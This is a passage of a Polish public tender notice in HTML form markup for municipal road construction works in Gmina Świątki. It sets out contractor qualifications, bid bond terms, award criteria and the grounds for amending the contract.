warunku, że znajduje się sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Określenie warunków: dla uznania że Wykonawca spełnia warunek posiadania doświadczeniazamawiający, żąda by wykonawca wykazał, iż w okresie ostatnich 15 lat, (a jeżeli okres prowadzeniadziałalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert wykonał, conajmniej 1 zadania odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiotzamówienia, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz którychroboty te zostały Wykonane. Przez ,,zadanie odpowiadające rodzajem robót budowlanychstanowiących przedmiot zamówienia", należy rozumieć budowę lub przebudowę lub remont1obiektów drogowych takich jak: drogi, chodniki, place, parkingi, ścieżki rowerowe, o nawierzchni zkostki brukowej betonowej lub o nawierzchni bitumicznej o wartości robót budowlanych min.100.000,00 zł brutto. Wykonawca złoży także oświadczenie, że dysponuje wiedzą i doświadczeniempotrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie wstępnegooświadczenia zgodnie z Załącznikiem nr 2 do SIWZ, o którym mowa w § VII ust. 1 SIWZ. Następniena podstawie wypełnionego przez wybranego Wykonawcę załącznika nr 3 do SIWZ ,,Wykazuwykonanych robót", o którym mowa w §VII ust. 6 pkt 1) SIWZ. Do przedmiotowego załącznika nr 3należy dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należytyoraz wskazujących, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowoukończone. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociażjeden z nich spełnia w/w warunek, b) kadra techniczna: Zamawiający uzna warunek za spełniony,jeżeli Wykonawca na czas realizacji zamówienia będzie dysponował osobami o odpowiednichkwalifikacjach zawodowych niezbędnych do wykonania zamówienia tj. c) Kierownik robót wspecjalności drogowej pełniący jednocześnie rolę kierownika budowy. Minimalne wymagania:posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie wspecjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, dowykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/wspecjalności umożliwiające zrealizowanie przedmiotowego zamówienia, Ocena spełniania warunkunastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ, o którym mowaw §VII ust. 1 SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę Załącznikanr 4 do SIWZ, o którym mowa w §VII ust. 6 pkt.2) SIWZ.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Zamawiający może wezwać wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Załącznik Nr 5 - informacja o przynależności do grupy kapitałowej</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Załącznik nr 3 do SIWZ - wykaz wykonanych robót Załącznik nr 4 - wykaz osób</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości: 10.000,00zł w terminie do dnia 25-09-2017r. do godz. 10:00. 2. Wadium może być wniesione w następującejformie: 1) Pieniądzu - przelewem na konto zamawiającego, prowadzone w Banku Spółdzielczym wJonkowie Oddział Świątki Nr konta bankowego: 63 8857 1025 3001 0000 0101 0004, o uznaniu przezzamawiającego, że wadium w pieniądzu wpłacono w terminie decyduje data wpływu środków narachunek zamawiającego. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się narachunku bankowym Zamawiającego, przed upływem terminu (godziny) przewidzianego nawniesienie wadium. 2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 3)Gwarancji bankowej 4) Gwarancji ubezpieczeniowej 5) Poręczeniach udzielanych przez podmioty, októrych mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej AgencjiRozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.) 3. W zależności od wybranejformy wadium (ust. 2 pkt 2-5) - zaleca się kserokopię dokumentu potwierdzającego wniesieniewadium dołączyć do oferty, a oryginał należy umieścić w kopercie wraz z ofertą. 4. Gwarancjabankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniejnastępujące wymogi (pod rygorem wykluczenia wykonawcy): 1) ustalać beneficjenta gwarancji, tj.Gminę Świątki reprezentowaną przez Wójta Gminy Świątki, 2) określać kwotę gwarantowaną w zł(ustaloną w SIWZ), 3) określać termin ważności (wynikający z SIWZ), 4) określać przedmiotgwarancji (wynikający z SIWZ), 5) musi zawierać klauzule gwarantujące bezwarunkową wypłatę narzecz zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 46 ust. 4a i ust. 5ustawy Pzp tj. być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie do wypłatyZamawiającemu pełnej kwoty wadium w okolicznościach wskazanych w ustawie pzp. 6) Gwarancjamusi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpiswinien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imiennąpieczątką lub czytelny (z podaniem imienia i nazwiska). 5. Wadium wniesione w pieniądzuzamawiający przechowuje na rachunku bankowym. 6. Wadium musi obejmować cały okres związaniaofertą. 7. Oferta, która nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie ikwocie zostanie odrzucona przedmiotowego postępowania.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji i rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiana postanowień niniejszej Umowy może nastąpić za zgodą obydwu Stron wyrażoną na piśmie, wformie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany. 2.Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określanastępujące okoliczności zmiany terminu ustalonego w § 3 ust. 1 niniejszej Umowy, w szczególności: 1)Wstrzymania, zawieszenia robót przez Zamawiającego, 2) zmiany spowodowane warunkamiatmosferycznymi w szczególności: a) uniemożliwiające prawidłowe wykonanie/prowadzenie zamówień/robót budowlanych, zgodnie z technologią ich wykonywania, normami lub innymi przepisami,przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów, wymagającej konkretnych warunkówatmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwemokolicznościami, za które Wykonawca ponosi odpowiedzialność, b) klęski żywiołowe - fakt ten musimieć odzwierciedlenie w Dzienniku budowy i musi być potwierdzony przez Zamawiającego i InspektoraNadzoru Inwestorskiego. 3) Opóźnienia w przyłączeniu obiektu do sieci ogólno gminnej przez gestorówmediów, powstałe z przyczyn nieleżących po stronie Wykonawcy, 4) wystąpienia wad Dokumentacjiprojektowej skutkujących koniecznością dokonania zmian w Dokumentacji projektowej, jeżeliuniemożliwia to lub wstrzymuje realizację określonego rodzaju robót mających wpływ na Terminwykonywania robót fakt ten musi mieć odzwierciedlenie w Dzienniku budowy i musi być potwierdzonyprzez Zamawiającego i Inspektora Nadzoru Inwestorskiego. 5) wystąpienia konieczności wykonaniarobót zamiennych na wniosek Zamawiającego lub Wykonawcy, udzielenia zamówień dodatkowych lubuzupełniających, które wstrzymują lub opóźniają realizację przedmiotu Umowy, 6) wystąpieniaopóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp. czynności lub ich zaniechania, do wydaniaktórych właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie sąnastępstwem okoliczności, za które Wykonawca ponosi odpowiedzialność 7) odmowy wydania przezwłaściwe organy decyzji, zezwoleń, uzgodnień itp. z przyczyn niezawinionych przez Wykonawcę 8)niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich wykonania zprzyczyn niezawinionych przez Wykonawcę, 9) działania siły wyższej , mającej bezpośredni wpływna terminowość wykonywania robót, 10) wystąpienia okoliczności, których strony umowy nie byływ stanie przewidzieć, pomimo zachowania należytej staranności, 11) wystąpienia zmian spowodowanychnieprzewidzianymi w SIWZ, STWiORB, Dokumentacji projektowej warunkami geologicznymi,archeologicznymi lub terenowymi, w szczególności: niewypały i niewybuchy, wykopaliskaarcheologiczne, 12) wystąpienia odmiennych od przyjętych w STWIORB oraz SIWZ warunkówgeologicznych, ale istotnych dla realizacji przedmiotu umowy, 13) wystąpienia odmiennych (ale istotnychdla realizacji przedmiotu umowy) od przyjętych w STWIORB oraz SIWZ warunków terenowych,w szczególności istnienie niezinwen taryzowanych lub błędnie zinwentaryzowanych obiektówbudowlanych, 14) w przypadku zmiany technologii jakości lub parametrów charakterystycznych dladanego elementu, wprowadzanych na wniosek Wykonawcy lub Zamawiającego, 15) w przypadkuwystąpienia robót zamiennych, o których mowa w §15 niniejszej Umowy 16) w przypadku koniecznościwykonania dodatkowych badań i ekspertyz, analiz itp., 17) niedotrzymanie wstępnego przyrzeczeniaprzez właścicieli nieruchomości, przez którą przebiega planowana inwestycja, co powoduje koniecznośćprzeprojektowania, 18) wystąpienia zmian w umowie z Instytucją Zarządzająca programem ProgramuRozwoju Obszarów Wiejskich na lata 2014 -2020 dla działania ,,Podstawowe usługi i odnowa wsi naobszarach wiejskich", poddziałania ,,Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lubrozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną ioszczędzanie energii" na operacje typu ,,Budowa lub modernizacja dróg lokalnych" 3. Zmianapostanowień Umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez zmianę sposobuwykonania przedmiotu Umowy, zmianę wynagrodzenia Wykonawcy lub poprzez przedłużenie Terminuzakończenia robót w przypadku: 1) zmiany przedmiotu zamówienia w przypadku wystąpienia robótzamiennych, o których mowa w §15 niniejszej umowy. 2) konieczności zrealizowania jakiejkolwiekczęści robót, objętych przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lubtechnologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych wad tejDokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanieprzewidzianych rozwiązań groziło niewykonaniem lub wykonaniem nienależytym przedmiotu Umowy 3)odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej warunków geologicznych,geotechnicznych lub hydrologicznych, rozpoznania terenu w zakresie znalezisk archeologicznych,występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeńniewykonaniem lub nienależytym wykonaniem przedmiotu Umowy 4) odbiegających w sposób istotnyod przyjętych w Dokumentacji projektowej warunków Terenu budowy, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,5) konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lubmateriałowych ze względu na zmiany obowiązującego prawa, 6) zaistnienia innych istotnychokoliczności prawnych lub technicznych, skutkujących niemożliwością wykonania lub należytegowykonania Umowy zgodnie z jej postanowieniami, 7) Zamawiający przewiduje możliwości zmiany -poprzez zawarcie aneksu do niniejszej umowy, wysokości wynagrodzenia brutto należnego Wykonawcy ztytułu realizacji niniejszej umowy w następujących przypadkach i w następujący sposób: a) W przypadkuustawowej zmiany stawki VAT (zwiększenia lub zmniejszenia) wartości netto z oferty Wykonawcypozostaną bez zmian, a kwota wynagrodzenia brutto Wykonawcy, zostanie wyliczona na podstawienowych przepisów z uwzględnieniem stopnia wykonania zamówienia wykonania zamówienia. W takimprzypadku Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresiepłatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkępodatku od towarów i usług. Wniosek powinien zawierać 